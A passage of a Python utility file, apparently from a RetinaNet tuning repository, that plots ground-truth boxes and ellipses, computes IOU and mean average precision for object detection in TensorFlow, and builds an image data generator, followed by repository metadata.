rectangle_params = tf.stack((ymin, xmin, ymax, xmax), axis=1)\n\n return rectangle_params\n\n\ndef plot_gt_ellipses(axis, ellipses, classes, category_index, scores):\n\n for i, annot in enumerate(ellipses):\n cx, cy, rx, ry, theta = annot\n\n ell = Ellipse(xy=(cx, cy), width=2 * rx, height=2 * ry, angle=theta * 180.0 / np.pi, zorder=i + 2)\n axis.add_artist(ell)\n ell.set_clip_box(axis.bbox)\n ell.set_color('black')\n ell.set_alpha(1)\n ell.set_linewidth(0.2)\n ell.set_fill(False)\n\n\ndef plot_gt_boxes(axis, boxes, classes, category_index, scores):\n\n for i, annot in enumerate(boxes):\n ymin, xmin, ymax, xmax = annot\n\n rr = Rectangle(xy=(xmin, ymin), width=xmax - xmin, height=ymax - ymin)\n axis.add_artist(rr)\n rr.set_clip_box(axis.bbox)\n rr.set_color('blue')\n rr.set_alpha(1)\n rr.set_linewidth(0.2)\n rr.set_fill(False)\n\n\ndef get_lists_from_batch(data_batch):\n # Unpack the ragged tensors of this batch.\n # The first dimension of each ragged tensor is the batch size.\n images_batch_rtensor, gt_boxes_rtensor, gt_classes_rtensor = data_batch\n\n # Convert the ragged tensors of this batch to lists of tensors:\n images_list = tf.split(images_batch_rtensor, images_batch_rtensor.shape[0], axis=0)\n images_list = [tf.squeeze(item.to_tensor(), axis=0) for item in images_list]\n\n gt_boxes_list = tf.split(gt_boxes_rtensor, gt_boxes_rtensor.shape[0], axis=0)\n gt_boxes_list = [tf.squeeze(item.to_tensor(), axis=0) for item in gt_boxes_list]\n\n gt_classes_list = tf.split(gt_classes_rtensor, gt_classes_rtensor.shape[0], axis=0)\n gt_classes_list = [tf.squeeze(item.to_tensor(), axis=0) for item in gt_classes_list]\n\n return images_list, gt_boxes_list, gt_classes_list\n\n\ndef get_list_from_ragged_batch(data_batch):\n # Convert the ragged tensors of this batch to lists of tensors:\n tensor_list = tf.split(data_batch, data_batch.shape[0], axis=0)\n tensor_list = [tf.squeeze(item.to_tensor(), axis=0) for item in tensor_list]\n\n return tensor_list\n\n\ndef get_list_from_batch(data_batch):\n # Convert the ragged tensors of this batch to lists of tensors:\n tensor_list = tf.split(data_batch, data_batch.shape[0], axis=0)\n tensor_list = [tf.squeeze(item, axis=0) for item in tensor_list]\n\n return tensor_list\n\n\n@tf.function()\ndef compute_iou_matrix(box_arr1, box_arr2):\n \"\"\"\n Compute the IOU matrix for two sets of bounding boxes.\n\n :param box_arr1: tf.Tensor\n Tensor of shape (n_objects, 4) with the first set of bounding box parameters.\n :param box_arr2: tf.Tensor\n Tensor of shape (n_objects, 4) with the second set of bounding box parameters.\n :return: tf.Tensor\n The resulting IOU matrix.\n \"\"\"\n\n epsilon = tf.constant(1e-9, dtype='float32')\n\n x11, y11, x12, y12 = tf.split(box_arr1, 4, axis=1)\n x21, y21, x22, y22 = tf.split(box_arr2, 4, axis=1)\n\n xA = tf.maximum(x11, tf.transpose(x21))\n yA = tf.maximum(y11, tf.transpose(y21))\n xB = tf.minimum(x12, tf.transpose(x22))\n yB = tf.minimum(y12, tf.transpose(y22))\n\n interArea = tf.maximum((xB - xA + epsilon), 0) * tf.maximum((yB - yA + epsilon), 0)\n boxAArea = (x12 - x11 + epsilon) * (y12 - y11 + epsilon)\n boxBArea = (x22 - x21 + epsilon) * (y22 - y21 + epsilon)\n\n iou_matrix = interArea / (boxAArea + tf.transpose(boxBArea) - interArea)\n\n return iou_matrix\n\n\n@tf.function()\ndef compute_map_iou_per_image(gt_boxes_tensor, gt_labels_tensor, pred_boxes_tensor, pred_labels_tensor,\n pred_boxes_scores,\n iou_threshold=0.5, n_scores=100):\n \"\"\"\n Compute the mean average precision (mAP) and the mean IOU for an image. 
The mean is taken across all classes,\n and in case of the mean IOU, across all score thresholds for each class.\n :param gt_boxes_tensor: tf.Tensor, shape=(n_boxes,4), dtype=float32\n A tensor with the ground truth boxes holding (ymin, xmin, ymax, xmax) values for each box in\n relative coordinates in [0,1].\n :param gt_labels_tensor: tf.Tensor, shape=(n_boxes,), dtype=int32\n A tensor with the ground truth class labels (starting from 0).\n :param pred_boxes_tensor: tf.Tensor, shape=(n_boxes,4), dtype=float32\n A tensor with the predicted boxes holding (ymin, xmin, ymax, xmax) values for each box in\n relative coordinates in [0,1].\n :param pred_labels_tensor: tf.Tensor, shape=(n_boxes,), dtype=int32\n A tensor with the predicted class labels (starting from 0).\n :param pred_boxes_scores: tf.Tensor, shape=(n_boxes,), dtype=float32\n A tensor with the probability scores (of the predicted class) of the predicted boxes.\n :param iou_threshold: float\n Threshold of the IOU metric in the computation of the mean average precision (mAP).\n :param n_scores: int\n The number of score thresholds for sampling the precision-recall curve.\n :return: (tf.Tensor, tf.Tensor)\n The mean average precision (across classes) and the mean IOU (across scores and classes).\n \"\"\"\n epsilon = tf.constant(1e-10)\n\n classes = tf.unique(gt_labels_tensor).y # determine the unique classes present in current image, ...\n num_cl = tf.shape(classes)[0] # ... and count them\n\n # initialize tensor array for aggregating each average precision value per class\n average_precisions = tf.TensorArray(tf.float32, size=num_cl, dynamic_size=False, clear_after_read=True)\n scores_maxf1 = tf.TensorArray(tf.float32, size=0, dynamic_size=True, clear_after_read=True)\n mean_ious = tf.TensorArray(tf.float32, size=num_cl, dynamic_size=False, clear_after_read=True)\n\n # loop over the classes present in the current image:\n for jj in tf.range(num_cl):\n\n i_class = classes[jj]\n\n # initialize tensor arrays for aggregating the precisions and recalls for each score threshold:\n precisions = tf.TensorArray(tf.float32, size=n_scores, dynamic_size=False, clear_after_read=True)\n recalls = tf.TensorArray(tf.float32, size=n_scores, dynamic_size=False, clear_after_read=True)\n ious = tf.TensorArray(tf.float32, size=n_scores, dynamic_size=False, clear_after_read=True)\n f1scores = tf.TensorArray(tf.float32, size=n_scores, dynamic_size=False, clear_after_read=True)\n\n # get the ground truth boxes corresponding to the current (i_class) class:\n index_gt_class = \\\n tf.squeeze(tf.where(\n tf.equal(gt_labels_tensor, i_class)\n ), axis=1)\n gt_boxes_tensor_class = tf.reshape(tf.gather(gt_boxes_tensor, index_gt_class), shape=(-1, 4))\n\n # get the scores corresponding to the current (i_class) class:\n pred_boxes_scores_class = tf.gather(pred_boxes_scores,\n tf.squeeze(tf.where(tf.equal(pred_labels_tensor, i_class))))\n # determine max score for current class:\n max_score_class = tf.reduce_max(pred_boxes_scores_class)\n # create score grid for current class for sampling the precision-recall curve:\n scores = tf.cast(tf.linspace(0.0, max_score_class, n_scores), dtype='float32')\n # NOTE: the number of true positives for a score threshold above the maximum score will be zero,\n # therefore the recall will be undefined. For the cases, the precision vs recall curve takes the constant\n # value of precision=1 at all recalls by definition. 
We account for this by setting the upper limit for\n # the score grid to max(score) for the class, and by adding the last precision recall point at the end of\n # the loop below:\n\n # for i_score, score in enumerate(scores[:-1]):\n for i_score in tf.range(n_scores - 1):\n score = scores[i_score]\n\n # get the predicted boxes corresponding to the current (i_class) class:\n index_pred_class = \\\n tf.squeeze(tf.where(\n tf.logical_and(tf.equal(pred_labels_tensor, i_class),\n tf.greater_equal(pred_boxes_scores, score))\n ), axis=1)\n pred_boxes_tensor_class = tf.gather(pred_boxes_tensor, index_pred_class)\n\n # Compute IOU matrix: rows correspond to gt boxes, columns to predicted boxes of current class:\n iou_matrix_class = compute_iou_matrix(gt_boxes_tensor_class, pred_boxes_tensor_class)\n\n mean_iou_boxes = tf.reduce_mean(tf.reduce_max(iou_matrix_class, axis=1))\n\n # Compute the number of true positives for this class:\n # count the rows in `iou_matrix_class` that have (at least) one iou > iou_threshold column\n tp = tf.reduce_sum(tf.cast(\n tf.reduce_any(tf.greater_equal(iou_matrix_class, iou_threshold), axis=1),\n dtype='float32'))\n\n # Compute the number of false negatives for this class:\n # count the rows in `iou_matrix_class` that do not have any iou > iou_threshold column\n fn = tf.reduce_sum(tf.cast(\n tf.logical_not(tf.reduce_any(tf.greater_equal(iou_matrix_class, iou_threshold), axis=1)),\n dtype='float32'))\n\n # Compute the number of false positives for this class:\n # count the columns in `iou_matrix_class` that do not have any iou > iou_threshold row\n fp1 = tf.reduce_sum(tf.cast(\n tf.logical_not(tf.reduce_any(tf.greater_equal(iou_matrix_class, iou_threshold), axis=0)),\n dtype='float32'))\n # for each row in `iou_matrix_class`, count all redundant iou > iou_threshold columns\n # get a boolean mask for the rows with at least one detection\n mask = tf.reduce_any(tf.greater_equal(iou_matrix_class, iou_threshold), axis=1)\n # get a subset of the iou matrix with the above boolean mask\n iou_matrix_class_detections = tf.boolean_mask(iou_matrix_class, mask)\n # count all redundant detections\n fp2 = tf.reduce_sum(tf.reduce_sum(tf.cast(tf.greater_equal(iou_matrix_class_detections, iou_threshold),\n dtype='float32'), axis=1) - 1)\n\n fp = fp1 + fp2\n\n precision = tp / (tp + fp + epsilon)\n recall = tp / (tp + fn + epsilon)\n\n f1score = 2 * precision * recall / (precision + recall + epsilon)\n\n recalls = recalls.write(i_score, recall)\n precisions = precisions.write(i_score, precision)\n f1scores = f1scores.write(i_score, f1score)\n ious = ious.write(i_score, mean_iou_boxes)\n\n recalls = recalls.write(n_scores - 1, 0)\n precisions = precisions.write(n_scores - 1, 1)\n f1scores = f1scores.write(n_scores - 1, 0)\n\n recalls = recalls.stack()\n precisions = precisions.stack()\n mean_iou_class = tf.reduce_mean(ious.stack())\n mean_ious = mean_ious.write(jj, mean_iou_class)\n\n # compute AP without interpolation:\n average_precision = tf.abs(-tf.reduce_sum(tf.experimental.numpy.diff(recalls) * precisions[:-1]))\n average_precisions = average_precisions.write(jj, average_precision)\n\n # compute detection score at maximum f1score:\n f1scores = f1scores.stack()\n argmax_f1scores = tf.argmax(f1scores)\n score_maxf1 = tf.gather(scores, argmax_f1scores)\n # save detection score at maximum f1score for each class only if it is non-zero:\n if tf.greater(score_maxf1, 0.):\n scores_maxf1 = scores_maxf1.write(jj, tf.stack([tf.cast(i_class, dtype=tf.float32), score_maxf1], axis=0))\n\n 
mean_iou = tf.reduce_mean(mean_ious.stack())\n\n # Stack the score_maxf1 values. The returned tensor will have two columns, the first will hold the classes\n # for which scores_maxf1 is non-zero, and the second will hold the scores_maxf1 value for that class.\n scores_maxf1 = scores_maxf1.stack()\n\n mean_average_precision = tf.reduce_mean(average_precisions.stack())\n\n return mean_average_precision, mean_iou, scores_maxf1\n\n\n@tf.function()\ndef compute_map_iou_per_batch(gt_boxes_tensors, gt_one_hot_labels_tensors, detections, batch_size,\n iou_threshold=0.5, n_scores=100, num_classes=1):\n # initialize tensor array for aggregating mAP values for each image in the batch:\n mean_average_precisions_batch = \\\n tf.TensorArray(tf.float32, size=batch_size, dynamic_size=False, clear_after_read=True)\n mean_iou_batch = \\\n tf.TensorArray(tf.float32, size=batch_size, dynamic_size=False, clear_after_read=True)\n scores_maxf1_batch = \\\n tf.TensorArray(tf.float32, size=0, dynamic_size=True, clear_after_read=True, infer_shape=False)\n scores_maxf1 = \\\n tf.TensorArray(tf.float32, size=num_classes, dynamic_size=False, clear_after_read=True)\n\n for ii in range(batch_size):\n # invert one-hot encodings back to 'dense' labels:\n gt_labels_tensor = tf.cast(tf.argmax(gt_one_hot_labels_tensors[ii], axis=1), dtype='int32')\n gt_boxes_tensor = gt_boxes_tensors[ii]\n\n # unpack the predicted classes and boxes from the `detections` dictionary:\n pred_labels_tensor = tf.cast(detections['detection_classes'][ii], dtype='int32')\n pred_boxes_tensor = detections['detection_boxes'][ii]\n pred_boxes_scores = detections['detection_scores'][ii]\n\n # ------------------------------------------------------------------------------\n\n mean_average_precision, mean_iou, scores_maxf1_img = \\\n compute_map_iou_per_image(gt_boxes_tensor, gt_labels_tensor,\n pred_boxes_tensor, pred_labels_tensor, pred_boxes_scores,\n iou_threshold=iou_threshold, n_scores=n_scores)\n\n mean_average_precisions_batch = mean_average_precisions_batch.write(ii, mean_average_precision)\n mean_iou_batch = mean_iou_batch.write(ii, mean_iou)\n scores_maxf1_batch = scores_maxf1_batch.write(ii, scores_maxf1_img)\n\n map_batch = tf.reduce_mean(mean_average_precisions_batch.stack())\n mean_iou_batch = tf.reduce_mean(mean_iou_batch.stack())\n\n scores_maxf1_all = scores_maxf1_batch.concat()\n # Loop through the classes and determine the mean score_maxf1. 
If there were no detections for that class\n    # in this batch, the score_maxf1 for it will be nan.\n    for i_class in tf.range(num_classes):\n        # mask = tf.equal(scores_maxf1_all[:, 0], tf.cast(i_class, tf.float32))\n        # if tf.not_equal(tf.size(mask), 0):\n        #     scores_maxf1_class = tf.boolean_mask(scores_maxf1_all[:, 1], mask, axis=0)\n\n        index_class = tf.where(tf.equal(scores_maxf1_all[:, 0], tf.cast(i_class, tf.float32)))\n        scores_maxf1_class = tf.gather(scores_maxf1_all[:, 1], index_class)\n        scores_maxf1 = scores_maxf1.write(i_class, tf.reduce_mean(scores_maxf1_class))\n\n    scores_maxf1 = scores_maxf1.stack()\n\n    return map_batch, mean_iou_batch, scores_maxf1\n\n\ndef get_datagen(image_path_list, gt_boxes_list, gt_labels_list, num_classes, label_id_offset):\n    \"\"\"\n    Returns a data generator for feeding a tensorflow.Dataset object.\n\n    :param image_path_list: array-like\n        List of the image files.\n    :param gt_boxes_list: list of numpy.ndarray\n        List of bounding box arrays corresponding to the images in `image_path_list`.\n        Each array has a shape of (n_boxes, 4) where the 4 columns contain the (ymin, xmin, ymax, xmax) values in\n        relative coordinates in [0,1].\n    :param gt_labels_list: list of numpy.ndarray\n        List of classification label arrays.\n    :param num_classes: int\n        The total number of ground truth classes\n    :param label_id_offset: int\n        The offset of label id's with respect to a labelling scheme that starts with 0.\n    :return: generator function\n    \"\"\"\n\n    def datagen():\n        for (image_path, gt_boxes_np, gt_labels_np) in zip(image_path_list, gt_boxes_list, gt_labels_list):\n            # # Load next image into PIL format:\n            # image_pil = tf.keras.utils.load_img(image_path)\n            # # Convert the image into a numpy array:\n            # image_np = tf.keras.preprocessing.image.img_to_array(image_pil, dtype='uint8')\n            # # Convert the image array into tensor and add a batch dimension:\n            # image_tensor = tf.expand_dims(tf.convert_to_tensor(image_np, dtype=tf.float32), axis=0)\n\n            image = tf.io.read_file(image_path)\n            image_tensor = tf.io.decode_image(image, channels=3, dtype=tf.uint8)\n            image_shape = tf.convert_to_tensor(image_tensor.shape, dtype=tf.int32)\n            image_tensor = tf.cast(image_tensor, dtype=tf.float32)\n\n            # Run the image tensor through the model's preprocessing method\n            # this requires a batch dimension:\n            # image_tensor = tf.expand_dims(image_tensor, axis=0)\n            # image_tensor = tf.squeeze(model.preprocess(image_tensor)[0], axis=0)\n            image_tensor = tf.RaggedTensor.from_tensor(image_tensor, row_splits_dtype=tf.int32)\n\n            # Convert the groundtruth boxes from numpy array into tensor:\n            gt_boxes_tensor = tf.convert_to_tensor(gt_boxes_np, dtype=tf.float32)\n            gt_boxes_rtensor = tf.RaggedTensor.from_tensor(gt_boxes_tensor, row_splits_dtype=tf.int32)\n\n            # Offset the groundtruth labels to start from 0,\n            # convert the labels numpy array into tensor,\n            # and change the labels into one-hot representation:\n            zero_indexed_groundtruth_classes = tf.convert_to_tensor(gt_labels_np - label_id_offset)\n            val_gt_one_hot_labels_tensor = tf.one_hot(zero_indexed_groundtruth_classes, num_classes)\n            val_gt_one_hot_labels_rtensor = tf.RaggedTensor.from_tensor(val_gt_one_hot_labels_tensor,\n                                                                        row_splits_dtype=tf.int32)\n\n            yield image_tensor, image_shape, gt_boxes_rtensor, val_gt_one_hot_labels_rtensor\n\n    return datagen\n", "repo_name": "idekany/TuneRetinaNet", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 38912, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": 
"github-code", "pt": "53", "api": [{"api_name": "json.load", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 44, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 44, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 67, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 68, "usage_type": "attribute"}, {"api_name": "numpy.loadtxt", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path", "line_number": 102, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path", "line_number": 105, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 151, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 152, "usage_type": "attribute"}, {"api_name": "tensorflow.io.gfile.GFile", "line_number": 167, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 167, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 168, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 168, "usage_type": "name"}, {"api_name": "six.BytesIO", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 171, "usage_type": "attribute"}, {"api_name": "object_detection.utils.visualization_utils.visualize_boxes_and_labels_on_image_array", "line_number": 199, "usage_type": "call"}, {"api_name": "object_detection.utils.visualization_utils", "line_number": 199, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imsave", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": "tensorflow.shape", "line_number": 261, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 265, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 268, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 268, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 271, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 271, "usage_type": "name"}, {"api_name": "tensorflow.shape", "line_number": 279, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 280, "usage_type": "call"}, {"api_name": "object_detection.utils.visualization_utils.visualize_boxes_and_labels_on_image_array", "line_number": 285, "usage_type": "call"}, {"api_name": "object_detection.utils.visualization_utils", "line_number": 285, "usage_type": "name"}, {"api_name": "tensorflow.shape", "line_number": 295, "usage_type": "call"}, {"api_name": 
"tensorflow.argmax", "line_number": 296, "usage_type": "call"}, {"api_name": "object_detection.utils.visualization_utils.visualize_boxes_and_labels_on_image_array", "line_number": 302, "usage_type": "call"}, {"api_name": "object_detection.utils.visualization_utils", "line_number": 302, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 308, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 308, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 310, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 310, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 311, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 311, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 313, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 313, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 347, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 358, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 363, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 364, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 364, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 368, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 368, "usage_type": "name"}, {"api_name": "object_detection.utils.visualization_utils.visualize_boxes_and_labels_on_image_array", "line_number": 372, "usage_type": "call"}, {"api_name": "object_detection.utils.visualization_utils", "line_number": 372, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 376, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 385, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 385, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 387, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 387, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 388, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 388, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 390, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 390, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 421, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 444, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 444, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 448, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 448, "usage_type": "name"}, {"api_name": "numpy.ones_like", "line_number": 451, "usage_type": "call"}, {"api_name": "numpy.ones_like", "line_number": 453, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 464, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 464, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 466, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 466, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 472, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 498, "usage_type": "call"}, 
{"api_name": "numpy.pi", "line_number": 498, "usage_type": "attribute"}, {"api_name": "tensorflow.atan", "line_number": 501, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 501, "usage_type": "call"}, {"api_name": "tensorflow.cos", "line_number": 501, "usage_type": "call"}, {"api_name": "tensorflow.cos", "line_number": 505, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 505, "usage_type": "call"}, {"api_name": "tensorflow.cos", "line_number": 506, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 506, "usage_type": "call"}, {"api_name": "tensorflow.atan", "line_number": 510, "usage_type": "call"}, {"api_name": "tensorflow.cos", "line_number": 510, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 510, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 514, "usage_type": "call"}, {"api_name": "tensorflow.cos", "line_number": 514, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 515, "usage_type": "call"}, {"api_name": "tensorflow.cos", "line_number": 515, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 518, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 518, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 519, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 519, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 528, "usage_type": "call"}, {"api_name": "matplotlib.patches.Ellipse", "line_number": 538, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 538, "usage_type": "attribute"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 552, "usage_type": "call"}, {"api_name": "tensorflow.split", "line_number": 567, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 568, "usage_type": "call"}, {"api_name": "tensorflow.split", "line_number": 570, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 571, "usage_type": "call"}, {"api_name": "tensorflow.split", "line_number": 573, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 574, "usage_type": "call"}, {"api_name": "tensorflow.split", "line_number": 581, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 582, "usage_type": "call"}, {"api_name": "tensorflow.split", "line_number": 589, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 590, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 608, "usage_type": "call"}, {"api_name": "tensorflow.split", "line_number": 610, "usage_type": "call"}, {"api_name": "tensorflow.split", "line_number": 611, "usage_type": "call"}, {"api_name": "tensorflow.maximum", "line_number": 613, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 613, "usage_type": "call"}, {"api_name": "tensorflow.maximum", "line_number": 614, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 614, "usage_type": "call"}, {"api_name": "tensorflow.minimum", "line_number": 615, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 615, "usage_type": "call"}, {"api_name": "tensorflow.minimum", "line_number": 616, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 616, "usage_type": "call"}, {"api_name": "tensorflow.maximum", "line_number": 618, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 622, "usage_type": "call"}, {"api_name": 
"tensorflow.function", "line_number": 595, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 653, "usage_type": "call"}, {"api_name": "tensorflow.unique", "line_number": 655, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 656, "usage_type": "call"}, {"api_name": "tensorflow.TensorArray", "line_number": 659, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 659, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 660, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 660, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 661, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 661, "usage_type": "attribute"}, {"api_name": "tensorflow.range", "line_number": 664, "usage_type": "call"}, {"api_name": "tensorflow.TensorArray", "line_number": 669, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 669, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 670, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 670, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 671, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 671, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 672, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 672, "usage_type": "attribute"}, {"api_name": "tensorflow.squeeze", "line_number": 676, "usage_type": "call"}, {"api_name": "tensorflow.where", "line_number": 676, "usage_type": "call"}, {"api_name": "tensorflow.equal", "line_number": 677, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 679, "usage_type": "call"}, {"api_name": "tensorflow.gather", "line_number": 679, "usage_type": "call"}, {"api_name": "tensorflow.gather", "line_number": 682, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 683, "usage_type": "call"}, {"api_name": "tensorflow.where", "line_number": 683, "usage_type": "call"}, {"api_name": "tensorflow.equal", "line_number": 683, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 685, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 687, "usage_type": "call"}, {"api_name": "tensorflow.linspace", "line_number": 687, "usage_type": "call"}, {"api_name": "tensorflow.range", "line_number": 695, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 700, "usage_type": "call"}, {"api_name": "tensorflow.where", "line_number": 700, "usage_type": "call"}, {"api_name": "tensorflow.logical_and", "line_number": 701, "usage_type": "call"}, {"api_name": "tensorflow.equal", "line_number": 701, "usage_type": "call"}, {"api_name": "tensorflow.greater_equal", "line_number": 702, "usage_type": "call"}, {"api_name": "tensorflow.gather", "line_number": 704, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 709, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 709, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 713, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 713, "usage_type": "call"}, {"api_name": "tensorflow.reduce_any", "line_number": 714, "usage_type": "call"}, {"api_name": "tensorflow.greater_equal", "line_number": 714, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 719, 
"usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 719, "usage_type": "call"}, {"api_name": "tensorflow.logical_not", "line_number": 720, "usage_type": "call"}, {"api_name": "tensorflow.reduce_any", "line_number": 720, "usage_type": "call"}, {"api_name": "tensorflow.greater_equal", "line_number": 720, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 725, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 725, "usage_type": "call"}, {"api_name": "tensorflow.logical_not", "line_number": 726, "usage_type": "call"}, {"api_name": "tensorflow.reduce_any", "line_number": 726, "usage_type": "call"}, {"api_name": "tensorflow.greater_equal", "line_number": 726, "usage_type": "call"}, {"api_name": "tensorflow.reduce_any", "line_number": 730, "usage_type": "call"}, {"api_name": "tensorflow.greater_equal", "line_number": 730, "usage_type": "call"}, {"api_name": "tensorflow.boolean_mask", "line_number": 732, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 734, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 734, "usage_type": "call"}, {"api_name": 